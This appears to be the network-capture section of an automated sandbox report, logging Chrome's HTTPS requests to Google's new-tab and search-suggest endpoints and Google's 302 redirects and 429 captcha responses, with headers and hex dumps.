                                                                    Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                    Date: Thu, 02 May 2024 02:59:51 GMT
                                                                    Server: gws
                                                                    Content-Length: 427
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Set-Cookie: 1P_JAR=2024-05-02-02; expires=Sat, 01-Jun-2024 02:59:51 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                    Set-Cookie: NID=513=NzyG8Nyv5BXujfkwphRTYxYEUVrb6jfX_2yeMuOfr_qNQxqvDKRrqrtrWEHZHxhJMeNDaUmaaS78O00fbCizccjghnIwkZvzsdQQgN5U-zhjUS1gHO8WIzLKgkl7guG8eeDU6_nnrtuUBmXKAstwUTeNKKRjYiMJ5yVbTN5x7t8; expires=Fri, 01-Nov-2024 02:59:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:51 UTC427INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 25 33 46 61 73 79 6e
                                                                    Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasyn


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.2249170172.217.1.44431776C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 02:59:51 UTC446OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-02 02:59:51 UTC1843INHTTP/1.1 302 Found
                                                                    Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGKeDzLEGIjDeDtf43edoX_DQr4xePeWIRj_Zk_cdJHjRaIqGGnjHhWEURD3S2dwEoI7xgpMRkzoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                    x-hallmonitor-challenge: CgwIp4PMsQYQ_tWelQISBL9gluE
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                    Permissions-Policy: unload=()
                                                                    Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                    Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                    Date: Thu, 02 May 2024 02:59:51 GMT
                                                                    Server: gws
                                                                    Content-Length: 458
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Set-Cookie: 1P_JAR=2024-05-02-02; expires=Sat, 01-Jun-2024 02:59:51 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                    Set-Cookie: NID=513=LkB_Hqntk55N-FkwqFcQWCEnqMKKabQfBv3CxQkaVu55mLFJndbeF9V5VbzO9R-GXq9I1GDYTeTS1uxTIrLIlWxuTFfPAOau3qyc6NTtnoWDpxWH0gdAD-ycAotGgLayl5TMxnrYksi6Xoq5vii-hCUmjtaY1oMG5kTAFZhXqVE; expires=Fri, 01-Nov-2024 02:59:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:51 UTC458INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68
                                                                    Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.2249171172.217.1.44431776C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 02:59:51 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-02 02:59:51 UTC1761INHTTP/1.1 302 Found
                                                                    Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKeDzLEGIjAngwEuuQDIFwKdm-Bs70gGjylYp6jr6gUkagUnxegoQxARWccq1LwEgBECfcL1PAAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                    x-hallmonitor-challenge: CgwIp4PMsQYQmP-K1gISBL9gluE
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                    Permissions-Policy: unload=()
                                                                    Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                    Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                    Date: Thu, 02 May 2024 02:59:51 GMT
                                                                    Server: gws
                                                                    Content-Length: 417
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Set-Cookie: 1P_JAR=2024-05-02-02; expires=Sat, 01-Jun-2024 02:59:51 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                    Set-Cookie: NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA; expires=Fri, 01-Nov-2024 02:59:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:51 UTC417INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26
                                                                    Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.2249172172.217.1.44431776C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 02:59:51 UTC742OUTGET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKeDzLEGIjBSLRpDP2VScdj7Wpd5SrmnrYLtq8Jxv8Ovu6XTpT1_vcDso1uPHungiEeAb9P6jnYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: 1P_JAR=2024-05-02-02; NID=513=NzyG8Nyv5BXujfkwphRTYxYEUVrb6jfX_2yeMuOfr_qNQxqvDKRrqrtrWEHZHxhJMeNDaUmaaS78O00fbCizccjghnIwkZvzsdQQgN5U-zhjUS1gHO8WIzLKgkl7guG8eeDU6_nnrtuUBmXKAstwUTeNKKRjYiMJ5yVbTN5x7t8
                                                                    2024-05-02 02:59:52 UTC356INHTTP/1.1 429 Too Many Requests
                                                                    Date: Thu, 02 May 2024 02:59:52 GMT
                                                                    Pragma: no-cache
                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Content-Type: text/html
                                                                    Server: HTTP server (unknown)
                                                                    Content-Length: 3131
                                                                    X-XSS-Protection: 0
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:52 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 3f 61 73 79 6e 63 3d 6e 74 70 3a 32 3c 2f 74 69 74 6c 65 3e
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/ddljson?async=ntp:2</title>
                                                                    2024-05-02 02:59:52 UTC1255INData Raw: 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 50 6b 68 47 37 39 55 33 66 62 77 66 48 47 35 57 6e 55 69 42 32 58 68 37 33 32 64
                                                                    Data Ascii: tCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="PkhG79U3fbwfHG5WnUiB2Xh732d
                                                                    2024-05-02 02:59:52 UTC977INData Raw: 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e
                                                                    Data Ascii: ears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the mean


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.2249173172.217.1.44431776C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 02:59:51 UTC848OUTGET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGKeDzLEGIjDeDtf43edoX_DQr4xePeWIRj_Zk_cdJHjRaIqGGnjHhWEURD3S2dwEoI7xgpMRkzoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: 1P_JAR=2024-05-02-02; NID=513=LkB_Hqntk55N-FkwqFcQWCEnqMKKabQfBv3CxQkaVu55mLFJndbeF9V5VbzO9R-GXq9I1GDYTeTS1uxTIrLIlWxuTFfPAOau3qyc6NTtnoWDpxWH0gdAD-ycAotGgLayl5TMxnrYksi6Xoq5vii-hCUmjtaY1oMG5kTAFZhXqVE
                                                                    2024-05-02 02:59:52 UTC356INHTTP/1.1 429 Too Many Requests
                                                                    Date: Thu, 02 May 2024 02:59:52 GMT
                                                                    Pragma: no-cache
                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Content-Type: text/html
                                                                    Server: HTTP server (unknown)
                                                                    Content-Length: 3185
                                                                    X-XSS-Protection: 0
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:52 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
                                                                    2024-05-02 02:59:52 UTC1255INData Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 7a 66 5a 54 59 6f 63 53 5f
                                                                    Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="zfZTYocS_
                                                                    2024-05-02 02:59:52 UTC1031INData Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74
                                                                    Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.2249174172.217.1.44431776C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 02:59:52 UTC738OUTGET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKeDzLEGIjAngwEuuQDIFwKdm-Bs70gGjylYp6jr6gUkagUnxegoQxARWccq1LwEgBECfcL1PAAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.2249175172.217.1.44431776C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 02:59:52 UTC1040OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA; 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                                                                    2024-05-02 02:59:52 UTC1191INHTTP/1.1 200 OK
